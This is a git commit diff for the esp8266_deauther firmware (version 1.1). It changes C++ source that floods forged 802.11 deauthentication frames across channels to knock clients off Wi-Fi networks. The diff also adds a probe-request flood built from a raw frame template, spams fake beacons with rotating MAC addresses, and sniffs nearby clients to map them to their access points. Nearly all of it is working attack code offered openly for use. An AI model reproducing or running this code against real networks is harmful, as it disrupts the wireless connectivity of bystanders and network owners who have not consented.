Merge pull request #113 from spacehuhn/testing

v.1.1

Author: spacehuhn

README.md

@@ -74,7 +74,7 @@ You have 2 choices here. Uploading the bin files is easier but not as good for d
 
 **0** Download the current release from [here](https://github.com/spacehuhn/esp8266_deauther/releases)  
 
-**1** Upload using the ESP8266 flash tool of your choice. I recommend using the [nodemcu-flasher](https://github.com/nodemcu/nodemcu-flasher). Alternatively you can use the official [esptool](https://github.com/espressif/esptool) from espressif.
+**1** Upload using the ESP8266 flash tool of your choice. I recommend using the [nodemcu-flasher](https://github.com/nodemcu/nodemcu-flasher).  
 
 **That's all! :)**
 

esp8266_deauther/Attack.cpp

@@ -5,7 +5,7 @@ Attack::Attack(){
 }
 
 void Attack::generate(){
-  if(debug) Serial.print("generating Macs...");
+  if(debug) Serial.print("\n generating Macs...");
 
   Mac _randomBeaconMac;
   uint8_t _randomMacBuffer[6];
@@ -80,6 +80,24 @@ void Attack::buildBeacon(Mac _ap, String _ssid, int _ch, bool encrypt){
 
 }
 
+void Attack::buildProbe(String _ssid, Mac _mac){
+  int len = _ssid.length();
+  if(len > 32) len = 32;
+  packetSize = 0;
+
+  for(int i=0;i<sizeof(probePacket);i++) packet[packetSize+i] = probePacket[i];
+  packetSize += sizeof(probePacket);
+
+  for(int i=0;i<6;i++) packet[10+i] = _mac._get(i);
+
+  packet[packetSize] = len;
+  packetSize++;
+  
+  for(int i=0;i<len;i++) packet[packetSize+i] = _ssid[i];
+  packetSize += len;
+  
+}
+
 bool Attack::send(){
   if(wifi_send_pkt_freedom(packet, packetSize, 0) == -1){
     /*
@@ -101,7 +119,7 @@ void Attack::run(){
 
   /* =============== Deauth Attack =============== */
   if(isRunning[0] && currentMillis-prevTime[0] >= 1000){
-    if(debug) Serial.print("running "+(String)attackNames[0]+" attack");
+    if(debug) Serial.print("running "+(String)attackNames[0]+" attack...");
     prevTime[0] = millis();
 
     for(int a=0;a<apScan.results;a++){
@@ -117,23 +135,47 @@ void Attack::run(){
           if(clientScan.getClientSelected(i)){
             _selectedClients++;
 
-            buildDeauth(_ap, clientScan.getClientMac(i), 0xc0, settings.deauthReason );
-            for(int h=0;h<settings.attackPacketRate;h++) if(send()) packetsCounter[0]++;
-            
-            buildDeauth(_ap, clientScan.getClientMac(i), 0xa0, settings.deauthReason );
-            for(int h=0;h<settings.attackPacketRate;h++) if(send()) packetsCounter[0]++;
-            
+            if(settings.channelHop){
+              for(int j=1;j<12;j++){
+                wifi_set_channel(j);
+                
+                buildDeauth(_ap, clientScan.getClientMac(i), 0xc0, settings.deauthReason );
+                if(send()) packetsCounter[0]++;
+                
+                buildDeauth(_ap, clientScan.getClientMac(i), 0xa0, settings.deauthReason );
+                if(send()) packetsCounter[0]++;
+              }
+            }else{
+              buildDeauth(_ap, clientScan.getClientMac(i), 0xc0, settings.deauthReason );
+              for(int h=0;h<settings.attackPacketRate;h++) if(send()) packetsCounter[0]++;
+              
+              buildDeauth(_ap, clientScan.getClientMac(i), 0xa0, settings.deauthReason );
+              for(int h=0;h<settings.attackPacketRate;h++) if(send()) packetsCounter[0]++;
+            }
           }
         }
 
         if(_selectedClients == 0){
           Mac _client;
           _client.set(0xFF,0xFF,0xFF,0xFF,0xFF,0xFF);
-          buildDeauth(_ap, _client, 0xc0, 0x01 );
-          for(int h=0;h<settings.attackPacketRate;h++) if(send()) packetsCounter[0]++;
-            
-          buildDeauth(_ap, _client, 0xa0, 0x01 );
-          for(int h=0;h<settings.attackPacketRate;h++) if(send()) packetsCounter[0]++;
+
+          if(settings.channelHop){
+              for(int j=1;j<12;j++){
+                wifi_set_channel(j);
+
+                buildDeauth(_ap, _client, 0xc0, settings.deauthReason );
+                if(send()) packetsCounter[0]++;
+                
+                buildDeauth(_ap, _client, 0xa0, settings.deauthReason );
+                if(send()) packetsCounter[0]++;
+              }
+            }else{
+              buildDeauth(_ap, _client, 0xc0, settings.deauthReason );
+              for(int h=0;h<settings.attackPacketRate;h++) if(send()) packetsCounter[0]++;
+              
+              buildDeauth(_ap, _client, 0xa0, settings.deauthReason );
+              for(int h=0;h<settings.attackPacketRate;h++) if(send()) packetsCounter[0]++;
+            }
         }
 
       } 
@@ -150,7 +192,7 @@ void Attack::run(){
 
   /* =============== Beacon clone Attack =============== */
   if(isRunning[1] && currentMillis-prevTime[1] >= 100){
-    if(debug) Serial.print("running "+(String)attackNames[1]+" attack");
+    if(debug) Serial.print("running "+(String)attackNames[1]+" attack...");
     prevTime[1] = millis();
 
     for(int a=0;a<apScan.results;a++){
@@ -193,7 +235,7 @@ void Attack::run(){
       generate();
       macListChangeCounter = 0;
     }
-    if(debug) Serial.println(" done ");
+    if(debug) Serial.println(" done");
     if(settings.attackTimeout > 0){
       attackTimeoutCounter[1]++;
       if(attackTimeoutCounter[1]/10 > settings.attackTimeout) stop(1);
@@ -202,7 +244,7 @@ void Attack::run(){
 
   /* =============== Beacon list Attack =============== */
   if(isRunning[2] && currentMillis-prevTime[2] >= 100){
-    if(debug) Serial.print("running "+(String)attackNames[2]+" attack");
+    if(debug) Serial.print("running "+(String)attackNames[2]+" attack...");
     prevTime[2] = millis();
 
     for(int a=0;a<ssidList.len;a++){
@@ -216,39 +258,75 @@ void Attack::run(){
 
     stati[2] = (String)(packetsCounter[2]*10)+"pkts/s";
     packetsCounter[2] = 0;
-    /*macListChangeCounter++;
+    macListChangeCounter++;
     if(macListChangeCounter/10 >= macChangeInterval && macChangeInterval > 0){
       generate();
       macListChangeCounter = 0;
-    }*/
-    if(debug) Serial.println("done");
+    }
+    if(debug) Serial.println(" done");
     if(settings.attackTimeout > 0){
       attackTimeoutCounter[2]++;
       if(attackTimeoutCounter[2]/10 > settings.attackTimeout) stop(2);
     }
   }
+
+  /* =============== Probe Request Attack =============== */
+  if(isRunning[3] && currentMillis-prevTime[3] >= 1000){
+    if(debug) Serial.print("running "+(String)attackNames[3]+" attack...");
+    prevTime[3] = millis();
+    
+    for(int a=0;a<ssidList.len;a++){
+      buildProbe(ssidList.get(a), beaconAdrs._get(a));
+      if(send()) packetsCounter[3]++;
+    }
+    
+    stati[3] = (String)(packetsCounter[3]*10)+"pkts/s";
+    packetsCounter[3] = 0;
+    macListChangeCounter++;
+    if(macListChangeCounter >= macChangeInterval && macChangeInterval > 0){
+      generate();
+      macListChangeCounter = 0;
+    }
+    if(debug) Serial.println("done");
+    if(settings.attackTimeout > 0){
+      attackTimeoutCounter[3]++;
+      if(attackTimeoutCounter[3] > settings.attackTimeout) stop(3);
+    }
+  }
 
 }
 
 void Attack::start(int num){
+  Serial.println(num);
   if(!isRunning[num]){
+    Serial.println(num);
     isRunning[num] = true;
     stati[num] = "starting";
     prevTime[num] = millis();
     attackTimeoutCounter[num] = 0;
-    if(debug) Serial.println("starting "+(String)attackNames[num]+" attack");
-    if(num == 1 && isRunning[2]) stop(2);
-    else if(num == 2 && isRunning[1]) stop(1);
+    refreshLed();
+    if(debug) Serial.println("starting "+(String)attackNames[num]+" attack...");
+    if(num == 1){
+      stop(2);
+      stop(3);
+    } else if(num == 2){
+      stop(1);
+      stop(3);
+    } else if(num == 3){
+      stop(1);
+      stop(2);
+    }
   }else stop(num);
 }
 
 void Attack::stop(int num){
   if(isRunning[num]){
-    if(debug) Serial.println("stopping "+(String)attackNames[num]+" attack");
+    if(debug) Serial.println("stopping "+(String)attackNames[num]+" attack...");
     isRunning[num] = false;
     stati[num] = "ready";
     prevTime[num] = millis();
-  }
+    refreshLed();
+  } 
 }
 
 void Attack::stopAll(){
@@ -261,7 +339,7 @@ String Attack::getResults(){
   for(int i=0;i<attacksNum;i++) if(!isRunning[i]) stati[i] = "ready";
 
   if(apScan.getFirstTarget() < 0) stati[0] = stati[1] = "no AP";
-  if(ssidList.len < 1) stati[2] = "no SSID";
+  if(ssidList.len < 1) stati[2] = stati[3] = "no SSID";
 
   int _selected;
   String json = "{ \"aps\": [";
@@ -307,7 +385,24 @@ String Attack::getResults(){
   json += "}";
   if(debug){
     Serial.println(json);
-    Serial.println("done ");
+    Serial.println("done");
   }
   return json;
-}
+}
+
+void Attack::refreshLed(){
+   int numberRunning = 0;
+   for(int i=0; i<sizeof(isRunning); i++){
+    if(isRunning[i]) numberRunning++;
+    //if(debug) Serial.println(numberRunning);
+   }
+  if(numberRunning>=1 && settings.useLed){
+    if(debug) Serial.println("Attack LED : ON");
+    digitalWrite(2, LOW);
+  }
+  else if(numberRunning==0 || !settings.useLed){
+    if(debug) Serial.println("Attack LED : OFF");
+    digitalWrite(2, HIGH);
+  }
+}
+

esp8266_deauther/Attack.h

@@ -14,7 +14,7 @@ extern "C" {
 #include "Settings.h"
 #include "SSIDList.h"
 
-#define attacksNum 3
+#define attacksNum 4
 #define macListLen 64
 #define macChangeInterval 4
 
@@ -38,14 +38,16 @@ class Attack
     void stop(int num);
     void stopAll();
     String getResults();
+    void refreshLed();
   private:
 
     void buildDeauth(Mac _ap, Mac _client, uint8_t type, uint8_t reason);
     void buildBeacon(Mac _ap, String _ssid, int _ch, bool encrypt);
+    void buildProbe(String _ssid, Mac _mac);
     bool send();
 
     //attack declarations
-    const String attackNames[attacksNum] = {"deauth","beacon (clone)","beacon (list)"};
+    const String attackNames[attacksNum] = {"deauth", "beacon (clone)", "beacon (list)", "probe request"};
 
     //attack infos
     String stati[attacksNum];
@@ -106,9 +108,23 @@ class Attack
       0x00, 0x00 //RSN capabilities
     };
 
+    uint8_t probePacket[25] = {
+      /*  0 - 1  */ 0x40, 0x00,                         //Type: Probe Request
+      /*  2 - 3  */ 0x00, 0x00,                         //Duration: 0 microseconds
+      /*  4 - 9  */ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, //Destination: Broadcast
+      /* 10 - 15 */ 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, //Source: random MAC
+      /* 16 - 21 */ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, //BSS Id: Broadcast
+      /* 22 - 23 */ 0x00, 0x00,                         //Sequence number (will be replaced by the SDK)
+      /*    24   */ 0x00                                //Tag Number: SSID parameter set (0)
+      /*           ,0x06,                              //Tag length
+                    0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA //SSID
+       */
+    };
+
     int macListChangeCounter = 0;
     int attackTimeoutCounter[attacksNum];
     int channels[macListLen];
+    bool buildInLedStatus = false;
 };
 
 #endif

esp8266_deauther/ClientScan.cpp

@@ -76,6 +76,7 @@ bool ClientScan::stop(){
 }
 
 void ClientScan::packetSniffer(uint8_t *buf, uint16_t len){
+  int cliNbr;
   if(sniffing && len>27){
     from.set(buf[16],buf[17],buf[18],buf[19],buf[20],buf[21]);
     to.set(buf[22],buf[23],buf[24],buf[25],buf[26],buf[27]);
@@ -87,15 +88,19 @@ void ClientScan::packetSniffer(uint8_t *buf, uint16_t len){
           if(clientNum == -1 && results < maxClientScanResults){
             data_getVendor(to._get(0),to._get(1),to._get(2)).toCharArray(vendors[results],9);
             results++;
-            packets[clients.add(to)]++;
+            cliNbr = clients.add(to);
+            packets[cliNbr]++;
+            connectedToAp[cliNbr] = i;
           }else packets[clientNum]++;
-          /*if(debug){
+          /*
+          if(debug){
             Serial.print("found: ");
             from._print();
             Serial.print(" => ");
             to._print();
             Serial.println("");
-          }*/
+          }
+          */
         }
       }
     }
@@ -107,6 +112,7 @@ String ClientScan::getClientName(int num){ return nameList.get(clients._get(num)
 int ClientScan::getClientPackets(int num){ return packets[clients.getNum(clients._get(num))]; }
 String ClientScan::getClientVendor(int num){ return vendors[num]; }
 Mac ClientScan::getClientMac(int num){ return clients._get(num); }
+int ClientScan::getClientConnectedAp(int num){ return connectedToAp[num]; }
 bool ClientScan::getClientSelected(int num){ return selected[num]; }
 int ClientScan::getFirstClient(){
   for(int i=0;i<maxClientScanResults;i++){
@@ -124,7 +130,8 @@ String ClientScan::getResults(){
     json += "\"m\":\""+getClientMac(i).toString()+"\",";
     json += "\"n\":\""+(String)nameList.get(getClientMac(i))+"\",";
     json += "\"v\":\""+(String)getClientVendor(i)+"\",";
-    json += "\"s\":"+(String)getClientSelected(i);
+    json += "\"s\":"+(String)getClientSelected(i)+",";
+    json += "\"a\":\""+(String)apScan.getAPName(getClientConnectedAp(i))+"\"";
     json += "}";
     if((i!=results-1) && (i!=maxClientScanResults-1)) json += ",";
   }

esp8266_deauther/ClientScan.h

@@ -37,6 +37,7 @@ class ClientScan{
     String getClientVendor(int num);
     Mac getClientMac(int num);
     bool getClientSelected(int num);
+    int getClientConnectedAp(int num);
     int getFirstClient();
 
     int results = 0;
@@ -56,6 +57,7 @@ class ClientScan{
     char vendors[maxClientScanResults][9];
     int packets[maxClientScanResults];
     bool selected[maxClientScanResults];
+    int connectedToAp[maxClientScanResults];
 
     int channels[13];
     int channelsNum = 0;